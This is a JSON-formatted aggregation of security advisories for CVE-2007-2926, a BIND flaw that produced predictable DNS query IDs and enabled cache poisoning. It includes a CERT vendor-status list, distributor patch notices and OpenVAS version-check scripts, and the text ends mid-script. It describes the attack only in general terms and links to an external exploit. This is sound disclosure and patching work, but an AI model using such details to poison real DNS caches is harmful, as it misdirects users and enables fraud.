http://www.ubuntu.com/usn/usn-491-1\nOther Advisory URL: http://www.slackware.org/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.521385\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-July/000217.html\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103018-1\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:149\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00102.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200708-13.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070801-01-P.asc\nOther Advisory URL: http://www.trustix.org/errata/2007/0023/\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_47_bind.html\nOther Advisory URL: http://security.freebsd.org/advisories/FreeBSD-SA-07:07.bind.asc\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-389.htm\nOther Advisory URL: https://www4.itrc.hp.com/service/cki/docDisplay.do?docId=c01174368\nKeyword: DNS forgery pharming\n[CVE-2007-2926](https://vulners.com/cve/CVE-2007-2926)\n", "edition": 1, "modified": "2007-07-24T17:21:39", "published": "2007-07-24T17:21:39", "href": "https://vulners.com/osvdb/OSVDB:36235", "id": "OSVDB:36235", "title": "ISC BIND Predictable DNS Query IDs Cache Poisoning", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:35", "bulletinFamily": "info", "cvelist": ["CVE-2007-2926"], "description": "### Overview \n\nISC (Internet Systems Consortiuim) BIND generates cryptographically weak DNS query IDs which could allow a remote attacker to poison DNS caches.\n\n### Description \n\nFrom the ISC Bind [security page](<http://www.isc.org/sw/bind/bind-security.php>):\n\n_The DNS query id generation is vulnerable to cryptographic analysis which provides a 1 in 8 chance of guessing the next query id for 50% of the query ids. This can be used to perform cache poisoning by an attacker. \n \nThis bug only affects outgoing queries, generated by BIND 9 to answer questions as a resolver, or when it is looking up data for internal uses, such as when sending NOTIFYs to slave name servers. \n \nAll users are encouraged to upgrade._ \n \n--- \n \n### Impact \n\nA remote attacker could predict DNS query IDs and respond with arbitrary answers, thus poisoning DNS caches. \n \n--- \n \n### Solution \n\n**Upgrade or Patch**\n\n \nThis issue is addressed in ISC BIND 9.2.8-P1, BIND 9.3.4-P1, BIND 9.4.1-P1 or BIND 9.5.0a6. Users who obtain BIND from their operating system vendor should see the systems affected portion of this document for a partial list of affected vendors. \n \n--- \n \n### Vendor Information\n\n252735\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Debian GNU/Linux __ Affected\n\nNotified: July 26, 2007 Updated: July 30, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Debian project has fixed this vulnerability in its stable distribution Debian GNU/Linux 4.0 in version 9.3.4-2etch1 of bind9 and in its old stable distribution Debian GNU/Linux 3.1 in version 9.2.4-1sarge3 of bind9 via Debian Security Advisory 1341 as in \n\n<<http://www.debian.org/security/2007/dsa-1341>>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://www.debian.org/security/2007/dsa-1341> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252735 Feedback>).\n\n### Fujitsu Affected\n\nNotified: July 26, 2007 Updated: October 01, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Software Consortium __ Affected\n\nUpdated: July 27, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://www.isc.org/sw/bind/bind-security.php> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252735 Feedback>).\n\n### Openwall GNU/*/Linux __ Affected\n\nNotified: July 26, 2007 Updated: August 08, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis weakness has been corrected for Openwall GNU/*/Linux (Owl) 2.0-stable and Owl-current as of 2007/07/30 by updating the BIND package to version 9.3.4-P1.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. __ Affected\n\nNotified: July 26, 2007 Updated: July 28, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis issue affected the Bind package as shipped with Red Hat Enterprise Linux 2.1, 4, 4, and 5. Updated packages to correct this issue are available along with our advisories at the URLs below and via Red Hat Network.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SUSE Linux __ Affected\n\nNotified: July 26, 2007 Updated: August 03, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSUSE is affected by VU#252735 (CVE-2007-2926) and has released updates for it. Our advisory is at:\n\n<http://www.novell.com/linux/security/advisories/2007_47_bind.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. __ Affected\n\nNotified: July 26, 2007 Updated: August 03, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSolaris 10 is affected by this issue. Sun has published Sun Alert 103018 for this issue which is available here:\n\n<http://sunsolve.sun.com/search/document.do?assetkey=1-26-103018-1>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ubuntu __ Affected\n\nNotified: July 26, 2007 Updated: August 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://www.ubuntu.com/usn/usn-491-1> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252735 Feedback>).\n\n### EMC Corporation Not Affected\n\nNotified: July 26, 2007 Updated: July 30, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Not Affected\n\nNotified: July 26, 2007 Updated: July 30, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Apple Computer, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Mandriva, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: July 26, 2007 Updated: July 26, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 41 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.isc.org/sw/bind/bind-security.php>\n * <http://www.trusteer.com/docs/bind9dns.html>\n * <http://jvn.jp/cert/JVNVU%23252735/index.html>\n * <http://secunia.com/advisories/26195/>\n * <http://www.milw0rm.com/exploits/4266>\n * <http://docs.info.apple.com/article.html?artnum=307041>\n\n### Acknowledgements\n\nThis vulnerability was reported by ISC who credit Amit Klein from Trusteer.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-2926](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-2926>) \n---|--- \n**Severity Metric:** | 3.83 \n**Date Public:** | 2007-07-24 \n**Date First Published:** | 2007-07-27 \n**Date Last Updated: ** | 2008-08-06 13:02 UTC \n**Document Revision: ** | 27 \n", "modified": "2008-08-06T13:02:00", "published": "2007-07-27T00:00:00", "id": "VU:252735", "href": "https://www.kb.cert.org/vuls/id/252735", "type": "cert", "title": "ISC BIND generates cryptographically weak DNS query IDs", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "suse": [{"lastseen": "2016-09-04T12:16:05", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "Amit Klein found that the random number generator used by the BIND name server to compute DNS query IDs generates predictable values. Remote attackers could exploit this flaw to conduct DNS cache poisoning attacks (CVE-2007-2926).\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2007-08-01T16:07:35", "published": "2007-08-01T16:07:35", "id": "SUSE-SA:2007:047", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-08/msg00000.html", "type": "suse", "title": "DNS cache poisoning in bind, bind9", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:53", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols. \r\n\r\nA flaw was found in the way BIND generates outbound DNS query ids. If an\r\nattacker is able to acquire a finite set of query IDs, it becomes possible\r\nto accurately predict future query IDs. Future query ID prediction may\r\nallow an attacker to conduct a DNS cache poisoning attack, which can result\r\nin the DNS server returning incorrect client query data. (CVE-2007-2926)\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain backported patches to correct this issue.", "modified": "2019-03-22T23:43:48", "published": "2007-07-24T04:00:00", "id": "RHSA-2007:0740", "href": "https://access.redhat.com/errata/RHSA-2007:0740", "type": "redhat", "title": "(RHSA-2007:0740) Moderate: bind security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:03", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": " [9.2.4-27.0.1.el4]\n - fixed cryptographically weak query id generator (CVE-2007-2926) ", "edition": 4, "modified": "2007-07-24T00:00:00", "published": "2007-07-24T00:00:00", "id": "ELSA-2007-0740", "href": "http://linux.oracle.com/errata/ELSA-2007-0740.html", "title": "Moderate: bind security update ", "type": "oraclelinux", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:36:15", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0696"], "description": "[20:9.2.4-25.el3]\n- security fix for remote DoS (CVE-2009-0696, #514292)\n[20:9.2.4-24.el3]\n- abort timeout queries to reduce the number of open UDP sockets (#498164)\n- handle EMFILE error from accept() gracefully (#498164)", "edition": 4, "modified": "2009-07-29T00:00:00", "published": "2009-07-29T00:00:00", "id": "ELSA-2009-1181", "href": "http://linux.oracle.com/errata/ELSA-2009-1181.html", "title": "bind security and bug fix update", "type": "oraclelinux", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:33", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "\nProblem Description:\nWhen named(8) is operating as a recursive DNS server or\n\t sending NOTIFY requests to slave DNS servers, named(8)\n\t uses a predictable query id.\nImpact:\nAn attacker who can see the query id for some request(s)\n\t sent by named(8) is likely to be able to perform DNS cache\n\t poisoning by predicting the query id for other request(s).\nWorkaround:\nNo workaround is available.\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2007-07-24T00:00:00", "id": "3DE342FB-40BE-11DC-AEAC-02E0185F8D72", "href": "https://vuxml.freebsd.org/freebsd/3de342fb-40be-11dc-aeac-02e0185f8d72.html", "title": "FreeBSD -- Predictable query ids in named(8)", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2007-07-26T15:35:49", "published": "2007-07-26T15:35:49", "id": "FEDORA:L6QFZNNT017703", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 6 Update: bind-9.3.4-7.P1.fc6", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0696"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2009-07-30T03:55:31", "published": "2009-07-30T03:55:31", "id": "FEDORA:9658910F89A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: bind-9.6.1-4.P1.fc11", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:56:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "Check for the Version of BIND", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835018", "href": "http://plugins.openvas.org/nasl.php?oid=835018", "type": "openvas", "title": "HP-UX Update for BIND HPSBUX02251", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND HPSBUX02251\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote DNS cache poisoning\";\ntag_affected = \"BIND on\n HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.2.0 or BIND v9.3.2\";\ntag_insight = \"A potential vulnerability has been identified with HP-UX running BIND. The \n vulnerability could be exploited remotely tocause DNS cache poisoning.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01123426-4\");\n script_id(835018);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"HPSBUX\", value: \"02251\");\n script_cve_id(\"CVE-2007-2926\");\n script_name( \"HP-UX Update for BIND HPSBUX02251\");\n\n script_summary(\"Check for the Version of BIND\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"NameService.BIND-RUN\", revision:\"C.9.3.2.1.0\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS2-RUN\", patch_list:['PHNE_36973'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND2-UPGRADE\", revision:\"C.9.3.2.2.0\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv920.INETSVCS-BIND\", revision:\"D920\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND-UPGRADE\", revision:\"C.9.3.2.2.0\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-09T11:40:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "Check for the Version of BIND", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835018", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835018", "type": "openvas", "title": "HP-UX Update for BIND HPSBUX02251", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND HPSBUX02251\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote DNS cache poisoning\";\ntag_affected = \"BIND on\n HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.2.0 or BIND v9.3.2\";\ntag_insight = \"A potential vulnerability has been identified with HP-UX running BIND. The \n vulnerability could be exploited remotely tocause DNS cache poisoning.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01123426-4\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835018\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"HPSBUX\", value: \"02251\");\n script_cve_id(\"CVE-2007-2926\");\n script_name( \"HP-UX Update for BIND HPSBUX02251\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of BIND\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"NameService.BIND-RUN\", revision:\"C.9.3.2.1.0\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS2-RUN\", patch_list:['PHNE_36973'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND2-UPGRADE\", revision:\"C.9.3.2.2.0\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = 